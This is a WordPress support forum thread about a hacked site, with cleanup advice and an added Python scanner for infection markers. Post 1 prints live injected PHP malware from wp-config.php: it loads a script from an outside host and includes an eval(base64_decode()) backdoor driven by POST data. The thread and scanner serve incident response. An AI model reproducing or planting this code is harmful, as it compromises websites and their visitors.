

[resolved] Site hacked (7 posts)

  1. Gabriel Reguly
    Posted 2 years ago #


    I got this nasty code added in my wp-config file.

    global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

    That is removed now, but I wonder how I got infected, in order to prevent it from happening again.

    There is a thread here: http://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does/8079131#8079131


  2. seabro
    Posted 2 years ago #

    All of my sites got hacked too.

    This code was found in some PHP files. Also, there were some files in the root of each directory which begin with tmp_ then random numbers, like tmp_6576768676.php

    Also, check all your .htaccess files, but make sure you scroll down and across, as they modify .htaccess but the code is not straight after existing code.

    I just spent 2 hours sorting out about 50 directories. I hope all is clear now.
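
A defensive sweep for the indicators named in the first two posts (the `$sessdt_` variable prefix and `eval(base64_decode(` call from the injected snippet, `tmp_<digits>.php` files, and .htaccess content pushed down or across by padding), as an added example that is not part of any post in this thread. The thresholds, function names and sample tree are assumptions, and the sample files are constructed placeholders.

```python
import os
import re
import tempfile

TMP_NAME = re.compile(r"^tmp_\d+\.php$")             # e.g. tmp_6576768676.php
PHP_MARKERS = (b"$sessdt_", b"eval(base64_decode(")  # strings from the injected snippet
# Assumed thresholds: 20+ blank lines ("scroll down") or 80+ spaces/tabs ("across").
HIDDEN = re.compile(r"(?:\r?\n[ \t]*){21,}\S|[ \t]{80,}\S")

def check_file(name, data):
    """Return the reasons one file (name, raw bytes) looks suspicious."""
    reasons = ["tmp_<digits>.php file name"] if TMP_NAME.match(name) else []
    if name.endswith(".php"):
        reasons += ["contains " + m.decode() for m in PHP_MARKERS if m in data]
    elif name == ".htaccess":
        text = data.decode("utf-8", "replace")
        for hit in HIDDEN.finditer(text):
            lineno = text.count("\n", 0, hit.end()) + 1
            reasons.append(f"line {lineno}: content hidden behind blank lines or padding")
    return reasons

def scan(root):
    """Walk root and return sorted (relative_path, reason) pairs."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            hits += [(os.path.relpath(path, root), r) for r in check_file(name, data)]
    return sorted(hits)

# Constructed sample tree with harmless placeholder content.
SAMPLE = {"index.php": b"<?php echo 'ok';",
          "wp-config.php": b"<?php global $sessdt_o; /* constructed marker */",
          "tmp_1234567890.php": b"<?php /* constructed */",
          ".htaccess": b"RewriteEngine On\n" + b"\n" * 30 + b" " * 120 + b"# constructed\n"}

def scan_sample():
    """Write SAMPLE into a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(body)
        return scan(tmp)

if __name__ == "__main__":
    for rel, reason in scan_sample():
        print(f"{rel}: {reason}")
```

The `eval(base64_decode(` marker also appears in some legitimate code, so treat a hit as a file to review by hand rather than as proof of infection.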

  3. vencedorbg
    Posted 2 years ago #

    My best guess is that your theme is using timthumb. You have to update it by saving it from their official website, here,
    and then find it in your WordPress theme and replace it.

  4. Sabinou
    Posted 2 years ago #

    And don't forget to read

    Timthumb.php would be first to upgrade.

    If your web host provides server logs, you may wish to search if there are FTP/SSH logins by IPs other than your own (meaning: leaked credentials).

    Etcetera... Sadly, it's a vast question. The best usually is to do a clean reinstall (only reupping a fresh virgin theme, the double-checked uploads folder, redownloading the plugins from wordpress.org, restoring a database backup) and change ALL your passwords (web host account, FTP, SSH, emails including the "lost password" possible question).

  5. Gabriel Reguly
    Posted 2 years ago #

    Thanks for the answers.

    This hack also impacted non WP sites (like ZenPhoto) and was executed against an exploit in the Ajax File Manager included in TinyMCE by some CMS systems.

    One can read more detailed info here: http://www.zenphoto.org/trac/ticket/2005

    That answer was provided by an expert from WP Questions: http://wpquestions.com/question/showLoggedIn/id/3341

  6. Those are two different hacks, as it happens, but yeah, watch out for that too :/

  7. Gabriel Reguly
    Posted 2 years ago #

    Thanks Ipstenu!

    I had no timthumb installed; it was the Ajax File Manager on another site that was exploited and then infected my WordPress install too.

    (Both sites are on a shared server with several accounts/sites)


Topic Closed

This topic has been closed to new replies.
